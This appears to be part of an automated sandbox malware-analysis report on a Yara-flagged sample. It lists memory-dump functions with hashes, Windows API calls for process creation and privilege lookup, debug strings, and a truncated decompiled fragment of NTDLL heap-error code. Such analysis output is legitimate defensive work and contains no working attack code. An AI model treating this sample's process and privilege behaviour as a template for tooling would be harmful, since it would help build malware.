Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: 6CD012752002146BD710EB99CC85ED7776CEF44760F154459BA5C5B242C530F55086E0

Uniqueness

Uniqueness Score: -1.00%

Function 01299910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0129991A

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4ed093e4eb8c5a0378a7f86f08c4a9d1c0a283a6d056f1ba714f5ae2700eb2cb
Instruction ID: 3f547f91219aa7271c7319d697ffe4cd06205b624936a799b217a6101522b40b
Opcode Fuzzy Hash: 4ed093e4eb8c5a0378a7f86f08c4a9d1c0a283a6d056f1ba714f5ae2700eb2cb
Instruction Fuzzy Hash: 369002B121100813D14071A944047460006A7D0341FD1C011A5054594ECA998DD57BA5

Uniqueness

Uniqueness Score: -1.00%

Function 012999A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012999AA

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 07b3b665e8e89c1568042f972da05a26e03b96eab20eaa934d1e2ccc58d3fe57
Instruction ID: d7d6ea0b414a642f8c598730f41cb9dbca32c9f8ffbfb2c7b8d8b6c871aeec94
Opcode Fuzzy Hash: 07b3b665e8e89c1568042f972da05a26e03b96eab20eaa934d1e2ccc58d3fe57
Instruction Fuzzy Hash: 389002A135100853D10061A94414B060006E7E1341FD1C015E1054594DCA59CC527666

Uniqueness

Uniqueness Score: -1.00%

Function 01299860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0129986A

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3b916b3616808bb9c46d97441ddb495533d4b1111181ecfbadd4e8dee48f0ab6
Instruction ID: 0c536f1cc2de052e602dbd7277061590bd021e5240a77d04918f32d4e1858245
Opcode Fuzzy Hash: 3b916b3616808bb9c46d97441ddb495533d4b1111181ecfbadd4e8dee48f0ab6
Instruction Fuzzy Hash: 0690027121100823D11161A94504707000AA7D0381FD1C412A0414598DDA968952B661

Uniqueness

Uniqueness Score: -1.00%

Function 01299840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0129984A

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9c3be929262504ad642b5f3cdb353236bd98a0b129b2060b43293ac12836782a
Instruction ID: 092b87d26bb265942d316c9aad80d0eaeb017fbd3c64cdd0aef3416dc25f41b3
Opcode Fuzzy Hash: 9c3be929262504ad642b5f3cdb353236bd98a0b129b2060b43293ac12836782a
Instruction Fuzzy Hash: D7900261252045635545B1A944045074007B7E03817D1C012A1404990CC9669856EB61

Uniqueness

Uniqueness Score: -1.00%

Function 012998F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012998FA

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a1767b9a4a31216aaee89c1567836273766a0523209f854fe6d63122a59eb80b
Instruction ID: c839a7f830bf57415ee69df9ee85476b69176e554a88fc14efc33b620b427e43
Opcode Fuzzy Hash: a1767b9a4a31216aaee89c1567836273766a0523209f854fe6d63122a59eb80b
Instruction Fuzzy Hash: 3390026161100913D10171A94404616000BA7D0381FD1C022A1014595ECE658992B671

Uniqueness

Uniqueness Score: -1.00%

Function 01299A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01299A2A

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b2033aa76012577d014c4541e5faa1cdd5b7f72a7b415162f42bce62f05af2b0
Instruction ID: 33e50b80c1a98280feb7d0b6cb77f0e881a44faaca6101e03b4c7884558818d0
Opcode Fuzzy Hash: b2033aa76012577d014c4541e5faa1cdd5b7f72a7b415162f42bce62f05af2b0
Instruction Fuzzy Hash: BD90026161100453414071B988449064006BBE13517D1C121A0988590DC99988656BA5

Uniqueness

Uniqueness Score: -1.00%

Function 01299A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01299A0A

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bca183bd3991f73d45e7e4ef6cebc1e0abb824e6af7c25b55a33f010d8d2ead1
Instruction ID: c5d7f5d7a3a9dcebf81d03d9afb7cc4f9914ee5bb11df77c857b30ba255b1249
Opcode Fuzzy Hash: bca183bd3991f73d45e7e4ef6cebc1e0abb824e6af7c25b55a33f010d8d2ead1
Instruction Fuzzy Hash: 7E90027121140813D10061A9481470B0006A7D0342FD1C011A1154595DCA6588517AB1

Uniqueness

Uniqueness Score: -1.00%

Function 01299A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01299A5A

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8cd70052b181a4b628b9cab49823770b7d7bd428e8af814987a76adab82a85ca
Instruction ID: 433a124bd5654320c66e9337057220c90c9b681b620fea9bf2a4a299dcc6d9a3
Opcode Fuzzy Hash: 8cd70052b181a4b628b9cab49823770b7d7bd428e8af814987a76adab82a85ca
Instruction Fuzzy Hash: B890026122180453D20065B94C14B070006A7D0343FD1C115A0144594CCD5588616A61

Uniqueness

Uniqueness Score: -1.00%

Function 01299540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0129954A

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7309bad3ee0cd1b9b9c1ef0bb95539f4333eb4a9de6d926475ce5b31da14a286
Instruction ID: ce3a09fa521ed99c2ae5533f043b3e4c9e0a9796b2914e2e9b92147aee202e18
Opcode Fuzzy Hash: 7309bad3ee0cd1b9b9c1ef0bb95539f4333eb4a9de6d926475ce5b31da14a286
Instruction Fuzzy Hash: D9900265221004130105A5A907045070047A7D53913D1C021F1005590CDA6188616661

Uniqueness

Uniqueness Score: -1.00%

Function 012995D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012995DA

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b081f50026d615b4eb9a68b0dc554eaa140d46904b4ea45e5fa3bd40b5bd4253
Instruction ID: eb9ca03a4ae4a985b8b8274548ed101771558766a228479afc45346bbe8d8177
Opcode Fuzzy Hash: b081f50026d615b4eb9a68b0dc554eaa140d46904b4ea45e5fa3bd40b5bd4253
Instruction Fuzzy Hash: 1C9002A121200413410571A94414616400BA7E0341BD1C021E10045D0DC96588917665

Uniqueness

Uniqueness Score: -1.00%

Function 01299710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0129971A

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 537489f74778143bc2c8c9ff0811751e35f46bf2c8e71dd024e38f593d517ad2
Instruction ID: 61f83e3fccf34937c83c79cf133d76bbe0087fb676ad7b321b468b564c1a17ae
Opcode Fuzzy Hash: 537489f74778143bc2c8c9ff0811751e35f46bf2c8e71dd024e38f593d517ad2
Instruction Fuzzy Hash: 1390027121100813D10065E954086460006A7E0341FD1D011A5014595ECAA588917671

Uniqueness

Uniqueness Score: -1.00%

Function 012997A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012997AA

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9fcd4d4cd25f4256fb3556ec10ba65043c01d099d2f317d2262785846b666424
Instruction ID: 8dfa5047fdcedf30ff283b37bef9bb9ce2aff9af026e530106e45e4015c4d0d1
Opcode Fuzzy Hash: 9fcd4d4cd25f4256fb3556ec10ba65043c01d099d2f317d2262785846b666424
Instruction Fuzzy Hash: AD90026131100413D14071A954186064006F7E1341FD1D011E0404594CDD5588566762

Uniqueness

Uniqueness Score: -1.00%

Function 01299780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0129978A

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 29934d8c4d4b80333fd0e152f360a2b9551cf8ec5ca32a01f2c41eba04f6e59d
Instruction ID: a41348df4c1d5b218d5e1c21cf325ec24651ae98560a4b739a0c5773714cfec6
Opcode Fuzzy Hash: 29934d8c4d4b80333fd0e152f360a2b9551cf8ec5ca32a01f2c41eba04f6e59d
Instruction Fuzzy Hash: 5B90026922300413D18071A9540860A0006A7D1342FD1D415A0005598CCD5588696761

Uniqueness

Uniqueness Score: -1.00%

Function 01299660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0129966A

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 499efff9a70279c7dc90e4552a0260bc676d63ac8aa385e1537654e13266fea0
Instruction ID: b12ca3ea2ac4788c585555fbb65f7dd69c0a06ae05ba3bead31464c76184bc8f
Opcode Fuzzy Hash: 499efff9a70279c7dc90e4552a0260bc676d63ac8aa385e1537654e13266fea0
Instruction Fuzzy Hash: 2190027121100C13D18071A9440464A0006A7D1341FD1C015A0015694DCE558A597BE1

Uniqueness

Uniqueness Score: -1.00%

Function 012996E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012996EA

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bb070f59fcb03d5d55271160c0d291ec9f712c80eb9d196db9746be875c6c5d0
Instruction ID: e5aeb61251a4ffdc239d0a66ebcd9c7247385a5acdf44d5fe6bec28a06b5c968
Opcode Fuzzy Hash: bb070f59fcb03d5d55271160c0d291ec9f712c80eb9d196db9746be875c6c5d0
Instruction Fuzzy Hash: 5B90027121108C13D11061A9840474A0006A7D0341FD5C411A4414698DCAD588917661

Uniqueness

Uniqueness Score: -1.00%

Function 00409A90, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0DE, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(00408C9D,00408CC5,00408A5D,00000010,00408CC5,00000044,?,?,?,00000044,00408CC5,00000010,00408A5D,00408CC5,00408C9D,00408D09), ref: 0041A134

Memory Dump Source

Source File: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 60608616549e6523bb925fccdbbe3e5575a6dd3ba3babcae60f736c3e62ccbd5
Instruction ID: d24af6bdf9fa1fcd66daa8a78dbc5c95122a601547bbdab00ee8a28ec1b2e3d9
Opcode Fuzzy Hash: 60608616549e6523bb925fccdbbe3e5575a6dd3ba3babcae60f736c3e62ccbd5
Instruction Fuzzy Hash: 72019DB2210108ABCB54CF99DC81EEB77A9AF8C754F158258BA0DE7251C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(00408C9D,00408CC5,00408A5D,00000010,00408CC5,00000044,?,?,?,00000044,00408CC5,00000010,00408A5D,00408CC5,00408C9D,00408D09), ref: 0041A134

Memory Dump Source

Source File: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
Instruction ID: 173ac30113e64a83ee2d305be212b87474e0c21ff26aba2a0f1aa11dc87b8f48
Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
Instruction Fuzzy Hash: 5701B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0DA7241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A241, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200

Memory Dump Source

Source File: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: bbc0302fce18166d6c211f8d51024d216f3fab59fd3d4246740f2e298f5ee8a5
Instruction ID: b0d9ebc24d67e75e4bb28eec1c2ff80cbec37cc124bb13a41a87bbb5e6b5e095
Opcode Fuzzy Hash: bbc0302fce18166d6c211f8d51024d216f3fab59fd3d4246740f2e298f5ee8a5
Instruction Fuzzy Hash: 7BE0ED762112086AD610EB989C48CEAB7ADEBC4270F01C006F90C43602D235E96482E0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A062, Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D

Memory Dump Source

Source File: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 313005192c596f1aa4cb30124076278eeb6feeaeee0a0efd466b2b4bbc2912fc
Instruction ID: 0d108cbcb70d5d8434df5023596c011c2f9820c626e7444016a9426121d813be
Opcode Fuzzy Hash: 313005192c596f1aa4cb30124076278eeb6feeaeee0a0efd466b2b4bbc2912fc
Instruction Fuzzy Hash: 4BF0EDB4200208BFE718DF55DC8AEE737ACEF44720F004649F90D97242C231E821CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1C1, Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200

Memory Dump Source

Source File: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 16d4fadeb4c1408d8e9f6f764fada7d50b168b2fa9252f8dee282eb280f276b9
Instruction ID: e4e1e799ed138a97488f423adfad5e6644dce6394755419f9592347baa1d9b31
Opcode Fuzzy Hash: 16d4fadeb4c1408d8e9f6f764fada7d50b168b2fa9252f8dee282eb280f276b9
Instruction Fuzzy Hash: B7F08CB1600204AFCB10DF65CC81EEB7768EF89720F148559F949A7242DA31A952CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D

Memory Dump Source

Source File: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D

Memory Dump Source

Source File: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0A2, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8

Memory Dump Source

Source File: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 73ce3c31794c9e95988566a52458a1d62bf36adbaf4c71415ef702b2397d824b
Instruction ID: 545e44226ec553a958037e2e817296c066fcc0ef9a00f400eba02b7db1c60842
Opcode Fuzzy Hash: 73ce3c31794c9e95988566a52458a1d62bf36adbaf4c71415ef702b2397d824b
Instruction Fuzzy Hash: EBE0DF711042487BD7219B688C95FEBBBE8DF4AB60F148498B9C85B202CA31E901C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200

Memory Dump Source

Source File: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8

Memory Dump Source

Source File: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 0129967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01299694

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 534660b524547ebeb483d128a21ab38d80a3d1dd0a65a1408b05104dfd91e6ed
Instruction ID: 9f7d646e767a43a6d39f520884a62a88103c3589759f861289193f1d13a50720
Opcode Fuzzy Hash: 534660b524547ebeb483d128a21ab38d80a3d1dd0a65a1408b05104dfd91e6ed
Instruction Fuzzy Hash: 18B09B719114C5DADF11D7B94608717790177D0755F56C055D2020681B4778C0D1FAF5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0130B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

*** Resource timeout (%p) in %ws:%s, xrefs: 0130B352
*** enter .cxr %p for the context, xrefs: 0130B50D
The instruction at %p tried to %s , xrefs: 0130B4B6
Go determine why that thread has not released the critical section., xrefs: 0130B3C5
*** An Access Violation occurred in %ws:%s, xrefs: 0130B48F
*** enter .exr %p for the exception record, xrefs: 0130B4F1
*** then kb to get the faulting stack, xrefs: 0130B51C
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0130B476
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0130B38F
The instruction at %p referenced memory at %p., xrefs: 0130B432
The resource is owned shared by %d threads, xrefs: 0130B37E
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0130B53F
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0130B314
*** Inpage error in %ws:%s, xrefs: 0130B418
write to, xrefs: 0130B4A6
a NULL pointer, xrefs: 0130B4E0
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0130B305
<unknown>, xrefs: 0130B27E, 0130B2D1, 0130B350, 0130B399, 0130B417, 0130B48E
The resource is owned exclusively by thread %p, xrefs: 0130B374
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0130B484
an invalid address, %p, xrefs: 0130B4CF
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0130B3D6
The critical section is owned by thread %p., xrefs: 0130B3B9
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0130B2F3
This failed because of error %Ix., xrefs: 0130B446
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0130B2DC
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0130B323
read from, xrefs: 0130B4AD, 0130B4B2
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0130B39B
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0130B47D

Memory Dump Source

Source File: 00000002.00000002.317652158.0000000001230000.00000040.00000001.sdmp, Offset: 01230000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 89ae046e0419ace58b2497ed6c04e7be6a7fefd8bc885f825fa9c917ed1eb714
Instruction ID: bcbc865f7b7d7ac0e9fbf8f0f0795213a15cf3223fa40d4e5873d74430394927
Opcode Fuzzy Hash: 89ae046e0419ace58b2497ed6c04e7be6a7fefd8bc885f825fa9c917ed1eb714
Instruction Fuzzy Hash: 8581AA7DAA0204FFDB2B5B4ACC59E7B7FA5EF26A58F820088F5082B196D3618511C771

Uniqueness

Uniqueness Score: -1.00%

Function 01311C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01311C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x12348a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0125B150();
				} else {
					E0125B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x134589c);
				E0125B150("Heap error detected at %p (heap handle %p)\n",  *0x13458a0);
				_t27 =  *0x1345898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01311E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0125B150();
				} else {
					E0125B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
